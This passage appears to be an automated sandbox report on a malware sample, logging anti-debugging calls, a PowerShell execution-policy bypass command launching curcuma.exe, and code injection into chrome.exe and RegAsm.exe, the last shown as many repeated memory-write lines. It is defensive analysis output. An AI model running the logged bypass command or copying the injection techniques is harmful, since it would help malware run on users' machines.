Source: curcuma.exe, 00000025.00000003.2010925300.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616351848.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2051938064.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1604475755.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1627781449.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1923866933.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2058966823.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616886676.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2023877190.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1605583562.0000012CDD346000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0082F4FF BlockInput,23_2_0082F4FF
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007B338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,23_2_007B338B
Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007D5058 mov eax, dword ptr fs:[00000030h]23_2_007D5058
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_008120AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,23_2_008120AA
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007E2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_007E2992
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007D0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_007D0BAF
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007D0D45 SetUnhandledExceptionFilter,23_2_007D0D45
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007D0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_007D0F91
Source: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exeMemory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

barindex
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeMemory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 25ECC340000 protect: page execute and read and write
Bypasses PowerShell execution policy
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\curcuma.exe"'
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\curcuma.exeThread created: C:\Program Files\Google\Chrome\Application\chrome.exe EIP: CC340000
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900000 value starts with: 4D5AJump to behavior
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe protection: readonly
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900064Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9000C8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90012CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900190Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9001F4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900258Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9002BCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900320Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900384Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9003E8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90044CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9004B0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900514Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900578Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9005DCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900640Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9006A4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900708Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90076CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9007D0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900834Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900898Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9008FCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900960Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9009C4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900A28Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900A8CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900AF0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900B54Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900BB8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900C1CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900C80Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900CE4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900D48Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900DACJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900E10Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900E74Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900ED8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900F3CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 900FA0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901004Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901068Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9010CCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901130Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901194Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9011F8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90125CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9012C0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901324Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901388Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9013ECJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901450Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9014B4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901518Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90157CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9015E0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901644Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9016A8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90170CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901770Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9017D4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901838Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90189CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901900Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901964Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9019C8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901A2CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901A90Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901AF4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901B58Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901BBCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901C20Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901C84Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901CE8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901D4CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901DB0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901E14Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901E78Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901EDCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901F40Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 901FA4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902008Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90206CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9020D0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902134Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902198Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9021FCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902260Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9022C4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902328Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90238CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9023F0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902454Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9024B8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90251CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902580Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9025E4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902648Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9026ACJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902710Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902774Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9027D8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90283CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9028A0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902904Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902968Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9029CCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902A30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902A94Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902AF8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902B5CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902BC0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902C24Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902C88Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902CECJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902D50Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902DB4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902E18Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902E7CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902EE0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902F44Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 902FA8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90300CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903070Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9030D4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903138Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90319CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903200Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903264Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9032C8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90332CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903390Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9033F4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903458Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9034BCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903520Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903584Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9035E8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90364CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9036B0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903714Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903778Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9037DCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903840Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9038A4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903908Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 90396CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 9039D0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903A34Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903A98Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903AFCJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903B60Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903BC4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903C28Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903C8CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903CF0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903D54Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903DB8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903E1CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comMemory written: C:\Users\user\AppData\Local\Temp\353090\RegAsm.exe base: 903E80Jump to behavior
